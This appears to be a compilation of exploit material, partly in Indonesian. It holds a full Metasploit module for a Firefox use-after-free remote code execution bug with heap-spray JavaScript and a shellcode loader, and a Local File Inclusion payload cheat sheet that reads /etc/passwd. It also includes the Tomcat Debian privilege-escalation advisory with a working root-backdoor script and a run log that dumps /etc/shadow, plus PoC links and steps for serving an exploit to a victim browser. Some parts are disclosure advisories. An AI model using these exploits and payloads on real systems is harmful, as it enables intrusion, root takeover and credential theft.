Mozilla Firefox < 50.0.2 - 'nsSMILTimeContainer::NotifyTimeChange()' Remote Code Execution (Metasploit)

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
  class MetasploitModule < Msf::Exploit::Remote
    Rank = NormalRanking
    include Msf::Exploit::Remote::HttpServer
    def initialize(info={})
      super(update_info(info,
        'Name'           => "Firefox nsSMILTimeContainer::NotifyTimeChange() RCE",
        'Description'    => %q{
          This module exploits an out-of-bounds indexing/use-after-free condition present in
          nsSMILTimeContainer::NotifyTimeChange() across numerous versions of Mozilla Firefox
          on Microsoft Windows.
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
          [
            'Anonymous Gaijin',                                 # Original research/exploit
            'William Webb <william_webb[at]rapid7.com>'         # Metasploit module
          ],
          'Platform'       => 'win',
          'Targets'        =>
          [
            [ 'Mozilla Firefox',
              {
                'Platform' => 'win',
                'Arch'     => ARCH_X86,
              }
            ],
          ],
          'DefaultOptions'  =>
          {
            'EXITFUNC' => "thread",
            'InitialAutoRunScript' => 'migrate -f'
          },
          'References'     =>
          [
            [ 'CVE', '2016-9079' ],
            [ 'Bugzilla', '1321066' ]
          ],
          'Arch'           => ARCH_X86,
          'DisclosureDate' => "Nov 30 2016",
          'DefaultTarget'  => 0
        )
      )
    register_options(
      [
        OptBool.new('UsePostHTML', [ true, 'Rewrite page with arbitrary HTML after successful exploitation.  NOTE: if set to true, you should probably rewrite data/exploits/ff_smil_uaf/post.html to something useful!', false ]),
      ], self.class
    )
  end
  def exploit_html(cli)
    p = payload.encoded
    arch = Rex::Arch.endian(target.arch)
    payload_final = Rex::Text.to_unescape(p, arch, prefix='\\u')
    base_uri = "#{get_resource.chomp('/')}"
    # stuff that gets adjusted alot during testing
    defrag_x = %Q~
       for (var i = 0; i < 0x4000; i++)
         heap80[i] = block80.slice(0)
     ~
     defrag_y = %Q~
       for (var i = 0x4401; i < heap80.length; i++)
         heap80[i] = block80.slice(0)
     ~
    js = %Q~
    var worker = new Worker('#{base_uri}/worker.js');
    var svgns = 'http://www.w3.org/2000/svg';
    var heap80 = new Array(0x5000);
    var heap100 = new Array(0x5000);
    var block80 = new ArrayBuffer(0x80);
    var block100 = new ArrayBuffer(0x100);
    var sprayBase = undefined;
    var arrBase = undefined;
    var animateX = undefined;
    var containerA = undefined;
    var milestone_offset = 0x90;
    var $ = function(id) { return document.getElementById(id); }
    var heap = function()
    {
     var u32 = new Uint32Array(block80)
     u32[4] = arrBase - milestone_offset;
     u32[0xa] = arrBase + 0x1000 - milestone_offset;
     u32[0x10] = arrBase + 0x2000 - milestone_offset;
     var x = document.createElementNS(svgns, 'animate')
     var svg = document.createElementNS(svgns, 'svg')
     svg.appendChild(x)
     svg.appendChild(x.cloneNode(true))
     for (var i = 0; i < 0x400; i++)
       {
         var node = svg.cloneNode(true);
         node.setAttribute('id', 'svg' + i)
         document.body.appendChild(node);
       }
       #{defrag_x}
       for (var i = 0; i < 0x400; i++)
         {
           heap80[i + 0x3000] = block80.slice(0)
           $('svg' + i).appendChild(x.cloneNode(true))
         }
         for (var i = 0; i < 0x400; i++)
           {
             $('svg' + i).appendChild(x.cloneNode(true))
             $('svg' + i).appendChild(x.cloneNode(true))
           }
           for (var i = 0; i < heap100.length; i++)
             heap100[i] = block100.slice(0)
             #{defrag_y}
             for (var i = 0x100; i < 0x400; i++)
               $('svg' + i).appendChild(x.cloneNode(true))
             }
             var exploit = function()
             {
               heap();
               animateX.setAttribute('begin', '59s')
               animateX.setAttribute('begin', '58s')
               animateX.setAttribute('begin', '10s')
               animateX.setAttribute('begin', '9s')
               // money shot
               containerA.pauseAnimations();
             }
             worker.onmessage = function(e)
             {
              worker.onmessage = function(e)
              {
               window.setTimeout(function()
               {
                 worker.terminate();
                 document.body.innerHTML = '';
                 document.getElementsByTagName('head')[0].innerHTML = '';
                 document.body.setAttribute('onload', '')
                 document.write('<blink>')
                 }, 1000);
  }
  arrBase = e.data;
  exploit();
  }
  var idGenerator = function()
  {
   return 'id' + (((1+Math.random())*0x10000)|0).toString(16).substring(1);
  }
  var craftDOM = function()
  {
   containerA = document.createElementNS(svgns, 'svg')
   var containerB = document.createElementNS(svgns, 'svg');
   animateX = document.createElementNS(svgns, 'animate')
   var animateA = document.createElementNS(svgns, 'animate')
   var animateB = document.createElementNS(svgns, 'animate')
   var animateC = document.createElementNS(svgns, 'animate')
   var idX = idGenerator();
   var idA = idGenerator();
   var idB = idGenerator();
   var idC = idGenerator();
   animateX.setAttribute('id', idX);
   animateA.setAttribute('id', idA);
   animateA.setAttribute('end', '50s');
   animateB.setAttribute('id', idB);
   animateB.setAttribute('begin', '60s');
   animateB.setAttribute('end', idC + '.end');
   animateC.setAttribute('id', idC);
   animateC.setAttribute('begin', '10s');
   animateC.setAttribute('end', idA + '.end');
   containerA.appendChild(animateX)
   containerA.appendChild(animateA)
   containerA.appendChild(animateB)
   containerB.appendChild(animateC)
   document.body.appendChild(containerA);
   document.body.appendChild(containerB);
  }
  window.onload = craftDOM;
    ~
    # If you want to change the appearance of the landing page, do it here
    html = %Q~
    <html>
    <head>
    <meta charset="utf-8"/>
    <script>
    #{js}
    </script>
    </head>
    <body>
    </body>
    </html>
    ~
    if datastore['UsePostHTML']
      f = File.open(File.join(Msf::Config.data_directory, "exploits", "firefox_smil_uaf", "post.html"), "rb")
      c = f.read
      html = html.gsub("<blink>", c)
    else
      html = html.gsub("<blink>", "")
    end
    send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
  end
  def worker_js(cli)
    p = payload.encoded
    arch = Rex::Arch.endian(target.arch)
    payload = Rex::Text.to_unescape(p, arch)
    wt = File.open(File.join(Msf::Config.data_directory, "exploits", "firefox_smil_uaf", "worker.js"), "rb")
    c = wt.read
    c = c.gsub("INSERTSHELLCODEHEREPLZ", payload)
    c = c.gsub("NOPSGOHERE", "\u9090")
    send_response(cli, c, { 'Content-Type' => 'application/javascript', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
  end
  def is_ff_on_windows(user_agent)
    target_hash = fingerprint_user_agent(user_agent)
    if target_hash[:ua_name] !~ /Firefox/ or target_hash[:os_name] !~ /Windows/
      return false
    end
      return true
  end
  def on_request_uri(cli, request)
    print_status("Got request: #{request.uri}")
    print_status("From: #{request.headers['User-Agent']}")
    if (!is_ff_on_windows(request.headers['User-Agent']))
      print_error("Unsupported user agent: #{request.headers['User-Agent']}")
      send_not_found(cli)
      close_client(cli)
      return
    end
    if request.uri =~ /worker\.js/
      print_status("Sending worker thread Javascript ...")
      worker_js(cli)
      return
    end
    if request.uri =~ /index\.html/ or request.uri =~ /\//
      print_status("Sending exploit HTML ...")
      exploit_html(cli)
      close_client(cli)
      return
    end
  end
end

Mengumpulkan informasi Wifi/Hostpot dengan Kismet

Kismet is a wireless network detector, sniffer, and intrusion detection system. Kismet works predominately with Wi-Fi (IEEE 802.11) networks, but can be expanded via plug-ins to handle other network types.

  • 802.11 sniffing
  • Standard PCAP logging (compatible with Wireshark, TCPDump, etc)
  • Client/Server modular architecture
  • Plug-in architecture to expand core features
  • Multiple capture source support
  • Live export of packets to other tools via tun/tap virtual interfaces
  • Distributed remote sniffing via light-weight remote capture
  • XML output for integration with other tools

Dengan kismet kita bisa melihat informasi dari suatu Wireless AP/repeater, siapa yang terhubung dengan AP, encryption, MAC, Signal, Channel, hidden AP dan lain lain. Kismet berjalan di sistem operasi linux dan biasanya sudah tersedia di repo-repo lokal, cara Pengunaan pun terbilang cukuplah mudah.

https://www.kismetwireless.net/

Note For Local File Inclusion Web Penetration Testing

Local File Inclusion atau yang sering kita kenal dengan singkatan LFI merupakan sebuah celah pada sebuah website yang mana attacker/hacker dapat melakukan inject pada website tersebut melalui url.

  • PHP file:// Wrapper
    Payload ini mengirimkan post request ke server.

    Contoh : php://input&cmd=ls
  • PHP php://filter
    Perhatikan penggunaan payload berikut:

    php://filter/resource=/etc/passwd

    Dengan payload ini maka file /etc/passwd akan ditampilkan pada browser.

  • Null byte injection
    =/etc/passwd%2500
    =/etc/passwd%00

Apache Tomcat packaging on Debian-based distros – Local Root Privilege Escalation

=============================================
– Discovered by: Dawid Golunski
– http://legalhackers.com
– dawid (at) legalhackers.com

– CVE-2016-1240
– Release date: 30.09.2016
– Revision: 1
– Severity: High
=============================================
I. VULNERABILITY
————————-

Apache Tomcat packaging on Debian-based distros – Local Root Privilege Escalation

Affected debian packages:

Tomcat 8 <= 8.0.36-2
Tomcat 7 <= 7.0.70-2
Tomcat 6 <= 6.0.45+dfsg-1~deb8u1

Ubuntu systems are also affected. See section VII. for details.
Other systems using the affected debian packages may also be affected.
II. BACKGROUND
————————-

“The Apache Tomcat® software is an open source implementation of the
Java Servlet, JavaServer Pages, Java Expression Language and Java WebSocket
technologies. The Java Servlet, JavaServer Pages, Java Expression Language
and Java WebSocket specifications are developed under the Java Community
Process.

The Apache Tomcat software is developed in an open and participatory
environment and released under the Apache License version 2.
The Apache Tomcat project is intended to be a collaboration of the
best-of-breed developers from around the world.

Apache Tomcat software powers numerous large-scale, mission-critical web
applications across a diverse range of industries and organizations.
Some of these users and their stories are listed on the PoweredBy wiki page.

http://tomcat.apache.org/
III. INTRODUCTION
————————-

Tomcat (6, 7, 8) packages provided by default repositories on Debian-based
distributions (including Debian, Ubuntu etc.) provide a vulnerable
tomcat init script that allows local attackers who have already gained access
to the tomcat account (for example, by exploiting an RCE vulnerability
in a java web application hosted on Tomcat, uploading a webshell etc.) to
escalate their privileges from tomcat user to root and fully compromise the
target system.

IV. DESCRIPTION
————————-

The vulnerability is located in the tomcat init script provided by affected
packages, normally installed at /etc/init.d/tomcatN.

The script for tomcat7 contains the following lines:

—–[tomcat7]—-

# Run the catalina.sh script as a daemon
set +e
touch “$CATALINA_PID” “$CATALINA_BASE”/logs/catalina.out
chown $TOMCAT7_USER “$CATALINA_PID” “$CATALINA_BASE”/logs/catalina.out

——-[eof]——

Local attackers who have gained access to the server in the context of the
tomcat user (for example, through a vulnerability in a web application) would
be able to replace the log file with a symlink to an arbitrary system file
and escalate their privileges to root once Tomcat init script (running as root)
re-opens the catalina.out file after a service restart, reboot etc.

As attackers would already have a tomcat account at the time of exploitation,
they could also kill the tomcat processes to introduce the need for a restart.
V. PROOF OF CONCEPT EXPLOIT
————————-

——[ tomcat-rootprivesc-deb.sh ]——

#!/bin/bash
#
# Tomcat 6/7/8 on Debian-based distros – Local Root Privilege Escalation Exploit
#
# CVE-2016-1240
#
# Discovered and coded by:
#
# Dawid Golunski
# http://legalhackers.com
#
# This exploit targets Tomcat (versions 6, 7 and 8) packaging on
# Debian-based distros including Debian, Ubuntu etc.
# It allows attackers with a tomcat shell (e.g. obtained remotely through a
# vulnerable java webapp, or locally via weak permissions on webapps in the
# Tomcat webroot directories etc.) to escalate their privileges to root.
#
# Usage:
# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]
#
# The exploit can used in two ways:
#
# -active (assumed by default) – which waits for a Tomcat restart in a loop and instantly
# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted.
# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up
# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)
#
# -deferred (requires the -deferred switch on argv[2]) – this mode symlinks the logfile to
# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting.
# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a
# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can
# then add arbitrary commands to the file which will be executed with root privileges by
# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default
# Ubuntu/Debian Tomcat installations).
#
# See full advisory for details at:
# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html
#
# Disclaimer:
# For testing purposes only. Do no harm.
#

BACKDOORSH=”/bin/bash”
BACKDOORPATH=”/tmp/tomcatrootsh”
PRIVESCLIB=”/tmp/privesclib.so”
PRIVESCSRC=”/tmp/privesclib.c”
SUIDBIN=”/usr/bin/sudo”

function cleanexit {
# Cleanup
echo -e “\n[+] Cleaning up…”
rm -f $PRIVESCSRC
rm -f $PRIVESCLIB
rm -f $TOMCATLOG
touch $TOMCATLOG
if [ -f /etc/ld.so.preload ]; then
echo -n > /etc/ld.so.preload 2>/dev/null
fi
echo -e “\n[+] Job done. Exiting with code $1 \n”
exit $1
}

function ctrl_c() {
echo -e “\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation.”
cleanexit 0
}

#intro
echo -e “\033[94m \nTomcat 6/7/8 on Debian-based distros – Local Root Privilege Escalation Exploit\nCVE-2016-1240\n”
echo -e “Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m”

# Args
if [ $# -lt 1 ]; then
echo -e “\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n”
exit 3
fi
if [ “$2” = “-deferred” ]; then
mode=”deferred”
else
mode=”active”
fi

# Priv check
echo -e “\n[+] Starting the exploit in [\033[94m$mode\033[0m] mode with the following privileges: \n`id`”
id | grep -q tomcat
if [ $? -ne 0 ]; then
echo -e “\n[!] You need to execute the exploit as tomcat user! Exiting.\n”
exit 3
fi

# Set target paths
TOMCATLOG=”$1″
if [ ! -f $TOMCATLOG ]; then
echo -e “\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn’t exist. Try again.\n”
exit 3
fi
echo -e “\n[+] Target Tomcat log file set to $TOMCATLOG”

# [ Deferred exploitation ]

# Symlink the log file to /etc/default/locale file which gets executed daily on default
# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.
# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been
# restarted and file owner gets changed.
if [ “$mode” = “deferred” ]; then
rm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG
if [ $? -ne 0 ]; then
echo -e “\n[!] Couldn’t remove the $TOMCATLOG file or create a symlink.”
cleanexit 3
fi
echo -e “\n[+] Symlink created at: \n`ls -l $TOMCATLOG`”
echo -e “\n[+] The current owner of the file is: \n`ls -l /etc/default/locale`”
echo -ne “\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot”
echo -ne “\n you’ll be able to add arbitrary commands to the file which will get executed with root privileges”
echo -ne “\n at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can’t wait ;)\n\n”
exit 0
fi

# [ Active exploitation ]

trap ctrl_c INT
# Compile privesc preload library
echo -e “\n[+] Compiling the privesc shared library ($PRIVESCSRC)”
cat <<_solibeof_>$PRIVESCSRC
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dlfcn.h>
uid_t geteuid(void) {
static uid_t (*old_geteuid)();
old_geteuid = dlsym(RTLD_NEXT, “geteuid”);
if ( old_geteuid() == 0 ) {
chown(“$BACKDOORPATH”, 0, 0);
chmod(“$BACKDOORPATH”, 04777);
unlink(“/etc/ld.so.preload”);
}
return old_geteuid();
}
_solibeof_
gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl
if [ $? -ne 0 ]; then
echo -e “\n[!] Failed to compile the privesc lib $PRIVESCSRC.”
cleanexit 2;
fi

# Prepare backdoor shell
cp $BACKDOORSH $BACKDOORPATH
echo -e “\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`”

# Safety check
if [ -f /etc/ld.so.preload ]; then
echo -e “\n[!] /etc/ld.so.preload already exists. Exiting for safety.”
cleanexit 2
fi

# Symlink the log file to ld.so.preload
rm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG
if [ $? -ne 0 ]; then
echo -e “\n[!] Couldn’t remove the $TOMCATLOG file or create a symlink.”
cleanexit 3
fi
echo -e “\n[+] Symlink created at: \n`ls -l $TOMCATLOG`”

# Wait for Tomcat to re-open the logs
echo -ne “\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart…”
echo -e “\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)”
while :; do
sleep 0.1
if [ -f /etc/ld.so.preload ]; then
echo $PRIVESCLIB > /etc/ld.so.preload
break;
fi
done

# /etc/ld.so.preload file should be owned by tomcat user at this point
# Inject the privesc.so shared library to escalate privileges
echo $PRIVESCLIB > /etc/ld.so.preload
echo -e “\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`”
echo -e “\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload”
echo -e “\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`”

# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
echo -e “\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!”
sudo –help 2>/dev/null >/dev/null

# Check for the rootshell
ls -l $BACKDOORPATH | grep rws | grep -q root
if [ $? -eq 0 ]; then
echo -e “\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`”
echo -e “\n\033[94mPlease tell me you’re seeing this too 😉 \033[0m”
else
echo -e “\n[!] Failed to get root”
cleanexit 2
fi

# Execute the rootshell
echo -e “\n[+] Executing the rootshell $BACKDOORPATH now! \n”
$BACKDOORPATH -p -c “rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB”
$BACKDOORPATH -p

# Job done.
cleanexit 0

————–[ EOF ]——————–

Example exploit run:
~~~~~~~~~~~~~~

[email protected]:/tmp$ id
uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)

[email protected]:/tmp$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial

[email protected]:/tmp$ dpkg -l | grep tomcat
ii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine — core libraries
ii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine
ii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine — common files

[email protected]:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out

Tomcat 6/7/8 on Debian-based distros – Local Root Privilege Escalation Exploit
CVE-2016-1240

Discovered and coded by:

Dawid Golunski
http://legalhackers.com

[+] Starting the exploit in [active] mode with the following privileges:
uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)

[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out

[+] Compiling the privesc shared library (/tmp/privesclib.c)

[+] Backdoor/low-priv shell installed at:
-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh

[+] Symlink created at:
lrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload

[+] Waiting for Tomcat to re-open the logs/Tomcat service restart…
You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed 😉

[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges:
-rw-r–r– 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload

[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload

[+] The /etc/ld.so.preload file now contains:
/tmp/privesclib.so

[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!

[+] Rootshell got assigned root SUID perms at:
-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh

Please tell me you’re seeing this too 😉

[+] Executing the rootshell /tmp/tomcatrootsh now!

tomcatrootsh-4.3# id
uid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)
tomcatrootsh-4.3# whoami
root
tomcatrootsh-4.3# head -n3 /etc/shadow
root:$6$oaf[cut]:16912:0:99999:7:::
daemon:*:16912:0:99999:7:::
bin:*:16912:0:99999:7:::
tomcatrootsh-4.3# exit
exit

[+] Cleaning up…

[+] Job done. Exiting with code 0

Video / Demo PoC:
~~~~~~~~~~~~~~~~

http://legalhackers.com/videos/Apache-Tomcat-DebPkg-Root-PrivEsc-Exploit.html
VI. BUSINESS IMPACT
————————-

Local attackers who have gained access to tomcat user account (for example
remotely via a vulnerable web application, or locally via weak webroot perms),
could escalate their privileges to root and fully compromise the affected system.
VII. SYSTEMS AFFECTED
————————-

The following Debian package versions are affected:

Tomcat 8 <= 8.0.36-2
Tomcat 7 <= 7.0.70-2
Tomcat 6 <= 6.0.45+dfsg-1~deb8u1

A more detailed lists of affected packages can be found at:

Debian:
https://security-tracker.debian.org/tracker/CVE-2016-1240

Ubuntu:
http://www.ubuntu.com/usn/usn-3081-1/

Other systmes that use Tomcat packages provided by Debian may also be affected.
VIII. SOLUTION
————————-

Debian Security Team was contacted and has fixed affected upstream packages.
Update to the latest tomcat packages provided by your distribution.

IX. REFERENCES
————————-

http://legalhackers.com

http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html

PoC / Demo video of the exploit:
http://legalhackers.com/videos/Apache-Tomcat-DebPkg-Root-PrivEsc-Exploit.html

The exploit’s sourcecode
http://legalhackers.com/exploits/tomcat-rootprivesc-deb.sh

CVE-2016-1240
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1240

Ubuntu Security Notice USN-3081-1:
http://www.ubuntu.com/usn/usn-3081-1/

Debian Security Advisory DSA-3669-1 (tomcat7):
https://lists.debian.org/debian-security-announce/2016/msg00249.html
https://www.debian.org/security/2016/dsa-3669

Debian Security Advisory DSA-3670-1 (tomcat8):
https://www.debian.org/security/2016/dsa-3670

https://security-tracker.debian.org/tracker/CVE-2016-1240
X. CREDITS
————————-

The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com

XI. REVISION HISTORY
————————-

30.09.2016 – Advisory released

XII. LEGAL NOTICES
————————-

The information contained within this advisory is supplied “as-is” with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.

VideoLAN VLC Media Player 2.2.1 – ‘DecodeAdpcmImaQT’ Buffer Overflow

Author: Patrick Coleman

In modules/codec/adpcm.c, VLC can be made to perform an out-of-bounds
write with user-controlled input.

The function DecodeAdpcmImaQT at adpcm.c:595 allocates a buffer which
is filled with bytes from the input stream. However, it does not check
that the number of channels in the input stream is less than or equal
to the size of the buffer, resulting in an out-of-bounds write. The
number of channels is clamped at <= 5.

adpcm_ima_wav_channel_t channel[2];

for( i_ch = 0; i_ch < p_dec->fmt_in.audio.i_channels; i_ch++ )
{
channel[i_ch].i_predictor = (int16_t)((( ( p_buffer[0] << 1 )|(
p_buffer[1] >> 7 ) ))<<7);
channel[i_ch].i_step_index = p_buffer[1]&0x7f;

The mangling of the input p_buffer above and in
AdpcmImaWavExpandNibble() makes this difficult to exploit, but there
is a potential for remote code execution via a malicious media file.

POC:

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41025.mov

Microsoft Edge (Windows 10) – ‘chakra.dll’ Info Leak / Type

Author: Brian Pak
Source: https://github.com/theori-io/chakra-2016-11
Proofs of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40990.zip
chakra.dll Info Leak + Type Confusion for RCE
Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201)
Tested on Windows 10 Edge (modern.ie stable).
FillFromPrototypes_TypeConfusion.html: WinExec notepad.exe
FillFromPrototypes_TypeConfusion_NoSC.html: 0xcc (INT 3)
To run:
Download exploit/FillFromPrototypes_TypeConfusion.html to a directory.
Serve the directory using a webserver (or python's simple HTTP server).
Browse with a victim IE to FillFromPrototypes_TypeConfusion.html.